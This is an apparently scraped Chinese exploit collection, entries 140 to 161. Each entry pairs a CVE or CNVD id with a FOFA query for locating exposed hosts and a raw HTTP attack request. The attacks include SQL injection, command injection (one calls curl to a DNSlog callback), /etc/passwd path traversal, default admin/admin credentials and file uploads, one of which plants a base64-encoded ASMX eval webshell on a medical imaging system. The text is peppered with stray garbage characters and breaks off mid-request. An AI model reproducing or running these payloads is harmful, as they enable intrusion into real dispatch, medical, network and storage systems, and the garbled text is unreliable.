2 p) H+ |+ t4 m" W; @7 J: ]# H- @FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
* @2 [: e3 z; IGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
) L# L5 ~ y) I( J& qHost: x.x.x.x
/ P/ b! B$ M* z- `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0% W; L6 D4 Y, b) q. S8 v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 O. o& {; M$ L8 e ^6 G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 m9 e! j$ u1 ~' EAccept-Encoding: gzip, deflate, br
1 Q: H+ i3 L6 lConnection: close
5 G- u- c% v* S# FCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
6 ^3 \9 B6 Z2 ~Upgrade-Insecure-Requests: 15 F0 W; J* V3 e( w1 |0 C
- J8 _& I( V9 J% d" ~7 |
" {; l' @* x) y2 D# n
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入0 Y" s# O! x! E( P% @
CVE-2024-2566
% j: Z U7 N% I$ I: `8 n3 R- }FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
5 T! ^6 H- O1 T O( {+ z8 @GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
+ y- R* n+ ^ U, k/ EHost: x.x.x.x* L2 L2 F& G. Z0 k- L0 W8 J* k. V, b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0; [( |/ O. a/ _0 u. L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) J/ y) R, Q3 t7 V( t) NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; r! i/ z8 K x9 h4 K8 P ?$ JAccept-Encoding: gzip, deflate, br
. [% t5 K7 f2 ]$ lConnection: close8 V4 U# B. h. g# \
Cookie: authcode=h8g98 p, J4 [6 X0 t
Upgrade-Insecure-Requests: 1
& B0 e( k0 j' r% A2 J' H/ f) j
& T7 [" V# w; @2 d" r2 e# L7 K6 \# e6 J$ e0 `2 w+ p0 l
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
% z) g- a- G4 R, P+ ^FOFA:body="指挥调度管理平台"
& V5 V* M: w( EPOST /app/ext/ajax_users.php HTTP/1.1
- b B0 L0 [* d$ R# {5 CHost: your-ip
! S- u! G4 _0 p: W( ?+ F! h8 yUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info% K( g% q; h- x
Content-Type: application/x-www-form-urlencoded* q# a4 _# o; H6 ]) _( E
# U4 y; c4 Q* @3 n, |# O$ |; e A; l
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
% X! r* c2 [5 D6 ^+ U
) e) ^: l G6 ~9 W# `2 ~- L" ?$ R
! v9 G4 i, L9 o7 S' g( n' Z) K142. CMSV6车辆监控平台系统中存在弱密码
# _ L0 V2 g8 ?. h0 t7 Q# gCVE-2024-29666 j- D2 H1 ^4 N% j1 y: \; F- S
FOFA:body="/808gps/"
: @ ?/ `+ f3 i0 E: b2 Madmin/admin) n5 o( I q( p5 x, e% Z
143. Netis WF2780 v2.1.40144 远程命令执行& _- P2 Z4 L* m* o. ^( D P# H* [
CVE-2024-25850
9 i7 n3 T3 K: i- jFOFA:title='AP setup' && header='netis'$ _" q3 w5 p) U
PAYLOAD% ^3 Z. j r$ e2 Z6 p# y' @8 A0 l
: q; {+ \) P* d0 r1 p- H5 E8 `144. D-Link nas_sharing.cgi 命令注入" O7 D% w0 ]$ r \* @
FOFA:app="D_Link-DNS-ShareCenter"
1 i# y8 d6 R$ M! I9 T8 [. o- Bsystem参数用于传要执行的命令$ V3 Q' A3 K3 _; i
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.17 Q0 K# j* f/ Q6 k! V$ p6 }) `6 y
Host: x.x.x.x
3 Z4 d9 f6 F: \# iUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
- P i+ m8 K* nConnection: close
' L" B- t, t3 LAccept: */** _2 L( v2 H f0 X* S) J
Accept-Language: en
% C) r9 e/ G+ B! O+ N+ b) bAccept-Encoding: gzip8 p* K- m+ z: t
M1 Y. V" B2 Z0 v d9 S
, N0 z9 N4 j# |0 ~9 U- t145. Palo Alto Networks PAN-OS GlobalProtect 命令注入4 F- f( y. w( A4 i6 I. O6 q& v
CVE-2024-3400. }+ [! [: [: k- ]$ r9 f5 _
FOFA:icon_hash="-631559155"9 H7 O* u2 Y: T1 ?9 x
GET /global-protect/login.esp HTTP/1.18 r- E+ a6 g) Y" H/ E
Host: 192.168.30.112:1005
, b) ]: \3 ]. F9 `# n$ ?5 F% B9 lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
" A5 L6 ^% N; _( V7 e8 X( H+ PConnection: close
' y ^" o t/ A) p- ]Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;) v$ X, d; |: K, Q# ?
Accept-Encoding: gzip
3 u7 Z |$ D8 x; A' g3 u5 h) ?% L0 q( d' `. v8 M/ G- K
; |& Z- `6 P2 c146. MajorDoMo thumb.php 未授权远程代码执行
- g4 F; `7 l1 K+ b% V* c4 DCNVD-2024-02175
6 o8 s# p3 U* E$ I! x5 j' BFOFA:app="MajordomoSL"5 k8 H" e0 l `5 y I
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1, p+ P" b4 D0 |3 W# `( H$ W4 l
Host: x.x.x.x1 n5 T2 W/ n Y$ `2 `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
- Z& m" G' g' _) w9 P* M9 ?Accept-Charset: utf-8
9 j: b& u3 W1 W UAccept-Encoding: gzip, deflate
2 a% C8 p1 F8 C* CConnection: close) l! V& {( [) F& s7 n
# Y1 M; c/ v5 k, b x
9 U4 \8 Q* D3 ?8 I, z147. RaidenMAILD邮件服务器v.4.9.4-路径遍历9 Z0 Y2 U3 z4 v# J
CVE-2024-323992 ^4 o' f5 {# s( G6 z7 M& p' c
FOFA:body="RaidenMAILD") ~7 u2 e! t3 I0 x9 X5 J6 p. j
GET /webeditor/../../../windows/win.ini HTTP/1.1
9 v. n Q7 U- _) P3 B3 ]% ZHost: 127.0.0.1:81$ u L# z0 Q, e1 M+ k
Cache-Control: max-age=0
2 k; T, j3 m. m- I' S4 vConnection: close
5 ]. v8 E! _# F' k
, e2 {1 P) c/ W0 s$ d* `/ _0 l3 U' z' z @ e3 H
148. CrushFTP 认证绕过模板注入2 D2 z: W( ]" B" d- y9 b7 J* r
CVE-2024-40404 I8 U* `; G# s$ x/ s
FOFA:body="CrushFTP" M# J1 i) p7 x/ _/ L1 }
PAYLOAD
9 j7 q4 d: m2 _; ] `" i9 Y: k
' M% O+ R: q2 k2 t4 _149. AJ-Report开源数据大屏存在远程命令执行$ [2 M5 t/ E5 u) L% p* ^
FOFA:title="AJ-Report"
4 `" Q1 M" {( i
c! Q& k. P2 B3 Y) o& Y; ^. G. WPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
- M7 b2 G- m4 E5 m1 [# NHost: x.x.x.x2 B Q/ R: m& U# {: q2 ~# P, u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36# x) r2 c2 C9 Z" d! W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% q8 q. ^, `( R0 N" `Accept-Encoding: gzip, deflate, br' P0 Y7 i9 \) l" r6 V
Accept-Language: zh-CN,zh;q=0.9
- O }4 t% Q2 S; g& k" gContent-Type: application/json;charset=UTF-8/ N6 P* `% [3 i9 m V/ s: x$ G5 h
Connection: close: X | m# d* s: Y) Q* N8 f+ q
8 v& l: Z3 s0 \ `" V
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
/ V$ g; d6 T& m4 L
' k9 z# T2 |, b150. AJ-Report 1.4.0 认证绕过与远程代码执行
$ Y3 x& w) c- c& gFOFA:title="AJ-Report"- P/ p* l- m% q* S& { B) }
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1& t) E. M9 b8 }4 _8 u/ e) v6 `, m. M
Host: x.x.x.x
. E+ f& K |8 _9 ]8 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36+ V, E! _, J/ j9 D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: @9 v3 W% [% h# V3 H$ p, ^2 ~0 P9 oAccept-Encoding: gzip, deflate, br2 t1 J- H- p8 B% ?) b: i1 T. A
Accept-Language: zh-CN,zh;q=0.9
+ d) _4 N# Y0 @+ O5 \3 o# ~Content-Type: application/json;charset=UTF-8: `+ a5 }3 w1 H: I
Connection: close$ [6 @4 q @+ r& z3 ], t
Content-Length: 339
4 Z( t3 O) l g5 i/ A1 X/ Y. U
# W& L; @( {5 u( Q+ z3 h3 l{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
. ?( ]. r& P8 [/ a. @ \0 o3 @$ w/ \- @! H- R- j
: P0 C! Z' C6 o' |5 @* D151. AJ-Report 1.4.1 pageList sql注入0 Q+ F, D& n p+ W' k# k+ F2 b
FOFA:title="AJ-Report"2 I4 w ]/ p' I: E2 {
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1- X8 i5 e4 R, L" ?5 V6 S
Host: x.x.x.x6 z9 c9 A& l% J. Z5 |$ p9 [6 R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
`+ s3 C5 @- H- O GConnection: close& j3 A7 l* G( c% i) G9 E: E
Accept-Encoding: gzip
' w+ n& r7 K6 O" G6 E4 g# n& P3 i. Q6 y+ O: I+ Z! n
: F# N! b9 q' d# E
152. Progress Kemp LoadMaster 远程命令执行9 S, A2 e6 v' r! h" R& s
CVE-2024-1212% ^$ ^ y+ G4 f, O& i1 ? h# p
LoadMaster <= 7.2.59.2 (GA)
, m4 b, Q& F0 cLoadMaster<=7.2.54.8 (LTSF)8 S6 T' I# ^# i3 A& T. i
LoadMaster <= 7.2.48.10 (LTS)2 j2 m$ `! T- t d. e
FOFA:body="LoadMaster"
. b$ P/ D6 d# eJztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
# w' X0 ?! G& L! }; ]4 q% jGET /access/set?param=enableapi&value=1 HTTP/1.1
! U$ v* f# q; C i4 R: sHost: x.x.x.x) {0 |( V" G0 O. V0 ^) T. ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
( h5 V& E. U8 p/ d- i3 CConnection: close
$ j# ~! i1 G2 a$ I9 XAccept: */*: \9 |1 O5 ~- ]) Q# ~) N
Accept-Language: en4 M- L, Y% c, z$ g
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=) U4 z2 v5 e U) P" ^& L! O6 O2 O
Accept-Encoding: gzip
5 C7 R2 i6 \+ U6 z. U4 l) O; w# M6 y0 T! F. |& {4 a
! ~0 Z6 `) M, f* z3 M5 x+ [
153. gradio任意文件读取5 ^. J9 O! a% o( z0 W0 W3 u8 [, L
CVE-2024-1561FOFA:body="__gradio_mode__"
. _4 A W. u7 Q6 M* {5 y( d3 K第一步,请求/config文件获取componets的id0 t' P) }! G$ i- _& R1 Z
http://x.x.x.x/config* ]: n: `/ A0 v0 J5 F+ E: T& p
" r9 [! S" O) q0 y- g$ u" e- r. a- `
4 T! v7 ^" v9 z8 V5 P M第二步,将/etc/passwd的内容写入到一个临时文件
( ~; A! M; K _7 d7 X) wPOST /component_server HTTP/1.1
# b% k) U7 `# {Host: x.x.x.x* r% @5 x! P7 A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
' I- \4 x3 a7 DConnection: close) p O7 e3 c4 }( u
Content-Length: 115) `) K! h$ x3 ]) X8 Q5 W X: ?0 m$ M$ A, `
Content-Type: application/json) x5 f& v( i! P
Accept-Encoding: gzip* c, Q' Q, F0 | L7 e
+ o2 S. M, k3 C X. t4 ?: f* o{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
h( w& u3 {. x% N$ t6 i4 v) }# \# A' g
* T% ^4 k% s# b4 D: t( `
. y. v! d( `: p* `第三步访问
2 a7 @# M) u8 Hhttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd# p7 Y4 \9 r! X( M8 C
( b$ t2 X4 E5 f, o8 Y
# H3 T) k0 T/ |- v154. 天维尔消防救援作战调度平台 SQL注入1 x1 d0 U! n6 R
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
! Z$ U- N, U0 B- lPOST /twms-service-mfs/mfsNotice/page HTTP/1.1& @* p {9 o. {
Host: x.x.x.x9 k2 }: y/ X" @
Content-Length: 106
* f7 I \' c7 W1 B2 O) I7 vCache-Control: max-age=03 s& H# T+ w) Z+ C3 H0 V' a1 o1 c" Y5 s
Upgrade-Insecure-Requests: 1
" z6 c# u3 a( ?. k+ S( u& IOrigin: http://x.x.x.x' b3 j, O/ V1 U9 C$ T& u# L. H; W' A
Content-Type: application/json( G; r8 D. `. t$ h( T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
+ \$ R9 A& ^) j- ^' |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% s3 h, m( @# p; j
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page$ q/ h! P0 h" ^2 V" ?/ ]
Accept-Encoding: gzip, deflate! D! [* F3 t f M* t% l1 m
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
+ Y3 L: [$ N2 _Connection: close, m0 N$ e' N! s1 k2 i" `
4 W2 y: K5 I5 e2 L, l* n7 h# p{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}4 ~' X, x; Y6 {& G
' K/ O1 }8 N+ b2 N2 t( P
% z/ S6 z9 P& j6 I
155. 六零导航页 file.php 任意文件上传6 A: b2 U" Y% U9 [2 \# E" |4 K
CVE-2024-34982
; `8 Y5 F; k7 O" ~8 fFOFA:title=="上网导航 - LyLme Spage"5 P8 b% u0 V% w$ x- o8 S/ x
POST /include/file.php HTTP/1.1" e* h% q# L( k3 p0 s* Y* T
Host: x.x.x.x; l1 e9 ?6 r, g k5 ~. I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
8 g1 { Y2 d* G) s& a3 ?Connection: close
5 |8 o$ ]$ [; n: }, W6 nContent-Length: 232! ~3 ^! D! g* V; q. M
Accept: application/json, text/javascript, */*; q=0.01
: D( z$ W) s9 IAccept-Encoding: gzip, deflate, br
, K* K9 I) M ?! i7 X! J9 S- KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 U9 ]/ N0 ~1 z, Z( n7 \4 fContent-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f# N5 ]* Z1 u* r, c( {' N4 @$ B# O
X-Requested-With: XMLHttpRequest
5 r. k: w% a4 w/ s/ G7 ?1 w' h# M3 o( `" ~
-----------------------------qttl7vemrsold314zg0f# @+ M8 o: ^# I) J2 V3 p" ]5 B: ^
Content-Disposition: form-data; name="file"; filename="test.php"
+ G o6 G p7 r0 U3 X: IContent-Type: image/png) [9 B# }( l7 @3 m1 f$ T( a8 ]
" h0 p" r# p$ [1 n' _. a8 ]! v; [
<?php phpinfo();unlink(__FILE__);?>
C, |6 e5 t; v7 P-----------------------------qttl7vemrsold314zg0f--
- q/ } x3 i) A# z$ m& T- ^
! x6 @+ A( t, M; F7 c
4 e# b9 ^0 e I! r访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
7 I& }- ^/ N! S! z. H8 r2 O/ h* [% A( W" Z* P% ~7 p" I
156. TBK DVR-4104/DVR-4216 操作系统命令注入
2 [7 b3 n! z+ r2 O6 Y8 MCVE-2024-37211 c* c, Q( o0 a( `) P
FOFA:"Location: /login.rsp"& b7 {& a2 l1 O6 U+ k6 M* j
·TBK DVR-4104& k% Q' x6 q X+ h+ z: S& \
·TBK DVR-42169 u r" h' p( {
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1": G" ]8 }1 C6 T6 p
* N! V. b$ V, O* r. K6 T& z9 `
, G9 g, B. p, b# L2 A- R: c# W
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
! T) f& H: t% S6 l Y0 m- U0 `Host: x.x.x.x. k4 W8 @+ q( O) W$ E% u9 d
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! s# {& I" q+ s7 y1 kConnection: close
* h. x9 k: U5 r! X8 \' `Content-Length: 0/ s) K1 U6 \1 g( i, R
Cookie: uid=1
: j" [0 w7 \: J; J, S# K; B9 nAccept-Encoding: gzip
6 x: }3 y$ S3 w7 D( l- u* c; l q S& [/ R! N" J) s+ m; `3 `0 Z
: c1 D7 m( h, U4 M% O* m- J157. 美特CRM upload.jsp 任意文件上传
2 w( E5 e+ T8 T! V5 R8 ICNVD-2023-06971
B- Y4 S' L% K% a. G4 M# qFOFA:body="/common/scripts/basic.js"
$ S3 n9 g! w" [: {! kPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1) p* g* I5 v: _
Host: x.x.x.x
b/ M) h; Z- X" m6 F5 R% sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.366 v' H! r- J7 {- G: {% k
Content-Length: 709
% C% P' X5 L" P+ q) ] @1 wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ U2 L( W& V/ _" g# t" r0 `/ r- fAccept-Encoding: gzip, deflate
6 K" l* T! M: mAccept-Language: zh-CN,zh;q=0.9
; p I! ]1 s0 i# ACache-Control: max-age=0
: q$ q' Z0 ]1 B6 S y+ \Connection: close
# U+ e# L) {- {8 F: e. C0 xContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
/ L, w0 \. r# [# sUpgrade-Insecure-Requests: 1) i$ b& |1 o5 _* n) X/ Z1 }. _! V
, t" K% r* z+ [9 T1 i1 j------WebKitFormBoundary1imovELzPsfzp5dN4 ?8 z# E. d* o1 N! b" M" @ \0 ?
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"0 v% z8 }& u, j. t4 v
Content-Type: application/octet-stream
* w9 L4 `9 j# M* w2 n( T6 e& n+ [% e; \6 L& o8 L8 @8 c4 R- O+ M9 g
nyhelxrutzwhrsvsrafb, W5 e3 J5 F' J3 V' X
------WebKitFormBoundary1imovELzPsfzp5dN
- L1 D8 H2 N3 t2 RContent-Disposition: form-data; name="key"; P! ~ Z& ]' Q6 x3 Z
! m7 |5 e* |1 w6 q$ T. |# i6 Wnull5 O9 F1 ? b/ m# G/ s& C
------WebKitFormBoundary1imovELzPsfzp5dN- s& p& ~- B, E; w! C8 X
Content-Disposition: form-data; name="form"9 K/ q* j2 A- @# e6 ^
/ J2 O% c" h4 A6 z! u- @" a5 Anull
4 t Q' ~* C+ I2 X( C2 h------WebKitFormBoundary1imovELzPsfzp5dN
) L. d' m) j/ m+ y* {1 J' _2 `Content-Disposition: form-data; name="field"% ^% `8 z r6 U6 B4 W2 \- b7 u. _6 D
- b4 d' F( S# A- t: C, l2 [) i
null1 C! p& y* w0 i' T* W- J
------WebKitFormBoundary1imovELzPsfzp5dN0 s& e! _% } A- Z" f: B
Content-Disposition: form-data; name="filetitile"
% [( K1 I; g) i" h- a6 p+ \! I" k9 t0 {* Z* Q
5 \8 u Y% I, e' k) J' J: lnull: u S4 z0 h" v" E
------WebKitFormBoundary1imovELzPsfzp5dN& l" \, j* Y) B
Content-Disposition: form-data; name="filefolder"
, F) L; @' k0 ?
v: E z) N) P. H3 x$ anull
* H: | E8 d( `; i------WebKitFormBoundary1imovELzPsfzp5dN--$ L+ r5 p+ W8 T4 b" C) ]
% @ H& m% N+ E) C* [6 N/ u
6 a4 R6 G. k1 x- C7 @+ ~ w+ P4 B4 Z7 |http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
: q1 r0 K6 ~& F$ o: R6 C4 @0 C( n8 z& _' |
158. Mura-CMS-processAsyncObject存在SQL注入) t" }0 @8 p5 a" {
CVE-2024-32640- C; u( L) }' v2 b! Q( m% N
FOFA:"Generator: Masa CMS"
% c' G) C7 Y$ _2 a" q2 {! [POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
' p G% m; R2 Y* o1 Z0 h. v- sHost: {{Hostname}}
/ `9 n4 C- o) d' D/ L& S- nContent-Type: application/x-www-form-urlencoded
U* h Z+ a6 B/ s3 B2 z, i+ O
6 |( _- s& I6 N Q) d! Yobject=displayregion&contenthistid=x\'&previewid=10 `9 R" O" X, A& r! Y
6 t P. B1 |; f9 [# w6 m+ u$ {6 Q2 p2 Z, j0 u8 N- w( X9 d- F7 h* e
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
?$ W5 R5 D8 a+ f- ]FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")) M+ V+ V0 ]+ b6 Q4 t1 y
POST /webservices/WebJobUpload.asmx HTTP/1.1, x6 b8 G' O6 @$ r: h8 H
Host: x.x.x.x, p+ y4 d) B$ p& n- e: j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
$ v5 \/ S r8 `4 DContent-Length: 1080& s* W6 ?7 l5 N U) \. N5 @% J8 e
Accept-Encoding: gzip, deflate7 |# d+ z2 }! j" F2 f9 ]
Connection: close
! F: P8 }8 c1 I) Z x+ l6 aContent-Type: text/xml; charset=utf-8* j4 a/ `* x5 ?3 H U
Soapaction: "http://rainier/jobUpload"5 k7 }! a# Q& v" Q* r* F
% y3 y# _- q/ _2 D ?<?xml version="1.0" encoding="utf-8"?>
' A6 J0 t( { B; f<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">! e( x1 ~( Y3 y7 A
<soap:Body>7 \" B: L: Q: r8 T1 n- x- ~
<jobUpload xmlns="http://rainier">* B8 R" h2 J' U. \
<vcode>1</vcode>$ ^4 i( _) T$ F. O( c
<subFolder></subFolder>9 |! V; |9 ^4 {/ @. J7 f
<fileName>abcrce.asmx</fileName>! {2 @ e# \5 K5 w/ P7 A( I7 f k& F8 i
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
J* r) [! k3 t- A; V$ x$ }</jobUpload>
+ ?( _' E( h6 {1 L0 }</soap:Body>7 j- Y" \( O7 Z# Z3 K
</soap:Envelope>
0 b1 R) N3 w* u* n* V- s" I U* G0 a4 K/ c) f: ~. c
. p6 v/ H' n9 w2 D( p/ W( S+ P& t/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")9 p! v( h5 ~3 o9 P
/ w& r8 X0 E& l/ F: X6 p8 F) [* D
! B+ T2 G& b* n3 u2 D2 N% X
160. Sonatype Nexus Repository 3目录遍历与文件读取2 N6 K+ J8 g& }* Y
CVE-2024-4956
8 U6 x- J0 Q$ y6 `6 {+ HFOFA:title="Nexus Repository Manager"
P: ?5 B* w- ` ]( P9 Q& V/ SGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
* H( y F$ C3 CHost: x.x.x.x
& \% Y( P1 {$ w1 G7 D) |( O' ~User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
% C) l9 I' n- J/ V3 E% YConnection: close, A' U, Q/ ~( F
Accept: */*8 L* G% k$ K3 \: o: n9 H5 m! j
Accept-Language: en* E- I5 o6 q7 r5 |$ R o, d
Accept-Encoding: gzip" ~/ V0 N0 G: V. h5 o
2 m5 g$ K( }8 j }/ w. q. N, V a8 I/ Y, K
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传7 f( i" O6 a2 N7 G3 `5 B, A
FOFA:body="/KT_Css/qd_defaul.css"
4 S1 g3 S. J- ?' T* r+ S0 s' z第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密3 ~" q* x1 l# r
POST /Webservice.asmx HTTP/1.17 C, X% U1 x: S& i1 w9 ?" ~
Host: x.x.x.x
. |( v# Z6 [+ ~, [- j* \) Q8 U+ `* {. eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
5 C/ X! @5 O- ]* A- b0 tConnection: close
1 t! X$ r+ |* S) r9 a ]Content-Length: 445
/ |/ `: T% Z dContent-Type: text/xml
3 ?; H& I, ~9 f9 s5 K6 LAccept-Encoding: gzip
% H) U! Y/ F$ y, w: \7 j
6 D) m1 J M4 k. W) j+ F<?xml version="1.0" encoding="utf-8"?>1 Q% q( H7 ]& Z( g5 X& G- ?
<soap:Envelope xmlns:xsi="/ ?9 j9 Z! I% [$ q$ ^
